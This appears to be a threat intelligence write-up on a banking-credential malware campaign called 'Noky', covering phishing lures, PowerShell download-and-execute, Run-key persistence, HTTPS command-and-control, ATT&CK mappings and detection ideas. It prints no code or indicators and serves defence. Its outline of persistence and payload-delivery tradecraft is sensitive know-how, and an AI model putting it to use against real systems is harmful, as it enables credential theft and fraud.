Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The ‘Noky’ malware utilizes social engineering to gain initial access, typically through phishing emails leading to credential theft.
- Our analysis identified the use of T1059.001 – PowerShell for executing the malware payload, showcasing its reliance on legitimate system tools.
- Comprehensive C2 infrastructure enables the actor to maintain control over infected machines while exfiltrating data without detection.
Executive Summary
During our investigation into the ‘Noky’ malware, we observed a comprehensive attack chain designed to infiltrate banking systems, steal credentials, and facilitate financial fraud. The malware was delivered via phishing emails that masqueraded as legitimate communications, drawing victims into a web of deceit. Utilizing various tactics, techniques, and procedures (TTPs), the actor effectively maintained persistence and communication with a remote command and control (C2) server. Our analysis of the sample revealed that the ‘Noky’ implant is particularly adept at bypassing security measures and evading detection.
Initial Access
The initial access vector of the ‘Noky’ campaign is primarily social engineering, where the actor employs phishing emails containing malicious links or attachments. During the investigation, we identified that the emails often contain familiar branding and urgent calls to action, pressuring recipients to act swiftly. Upon clicking the link, victims are directed to a spoofed website designed to harvest credentials or drop the malware. We noted that many of these phishing lures are tailored to specific geographic regions, enhancing their effectiveness, and mimicking legitimate communications from well-known banks.
Execution & Persistence
Once the victim interacts with these malicious elements, the Noky malware executes itself, often leveraging T1059.001 – PowerShell as its primary means of execution. Our analysis revealed that the malware initiates a PowerShell command that downloads and executes additional payloads from the C2 server. The initial payload is designed to harvest login credentials from various banking websites, using techniques consistent with T1083 – File and Directory Discovery to locate browser profiles and cached login data.
Additionally, the persistence mechanisms employed include modifications to registry keys, specifically HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, to ensure re-execution upon system reboot. The actor’s foresight in maintaining a foothold in the victim’s environment demonstrates a profound understanding of the challenges faced during incident response.
Command and Control
The C2 layer of the ‘Noky’ campaign is characterized by a distributed architecture, employing multiple domains and IP addresses to obfuscate communications. Each infected host periodically polls these domains using a randomized timing strategy to reduce the likelihood of detection. We intercepted traffic indicative of T1071.001 – Application Layer Protocol, where the implant communicates over HTTPS, camouflaging its activities as legitimate web traffic.
During our analysis, several C2 indicators were identified, including domains that have previously been associated with banking Trojans, and IPs exhibiting suspicious behavior patterns. Traffic analysis revealed a pattern in the payload structure sent to the server, indicating potential data exfiltration mechanisms, specifically targeting sensitive information such as credentials and personal identification data.
Lateral Movement & Discovery
The actor demonstrates an understanding of lateral movement techniques. While our sample of ‘Noky’ did not implement explicit lateral movement, it did include functions consistent with T1210 – Exploitation of Remote Services, hinting that the actor could be developing capabilities to expand their access within the network. The malware collects credentials not just for local systems but also for network resources, revealing a strategy to leverage compromised credentials for further infiltration.
Impact & Objectives
The overarching objective of the ‘Noky’ campaign is financial gain through the theft of banking credentials and illicit transactions. Our investigation indicated that the actor could execute unauthorized payments, siphoning funds from victim accounts and possibly orchestrating larger-scale financial fraud schemes. The meticulous planning behind the initial phishing email showed a clear intent to exploit human behavior, allowing the malware to circumvent many traditional security barriers.
MITRE ATT&CK Mapping
- T1071.001 – Application Layer Protocol: C2 communication through standard application layer protocols such as HTTP/HTTPS.
- T1059.001 – PowerShell: Execution of commands through PowerShell scripts to execute secondary payloads.
- T1083 – File and Directory Discovery: Discovery of browser profiles for credential harvesting.
Detection Opportunities
- Implementing threat intelligence feeds to track known malicious domains and IPs associated with ‘Noky’.
- Monitoring for unusual PowerShell activities, especially those involving outbound HTTPS connections.
- Analyzing email traffic for signs of phishing attempts, particularly messages with urgency or requests for account verification.
Analyst Notes
The rising sophistication of threats like ‘Noky’ underscores the need for comprehensive security awareness training for employees. Additionally, organizations must consider leveraging advanced behavioral detection mechanisms alongside traditional signature-based defenses to effectively mitigate such threats. Continuous monitoring for outbound data transfers and anomalous user behaviors can serve as critical deterrents against these evolving threats.
Source: Original Report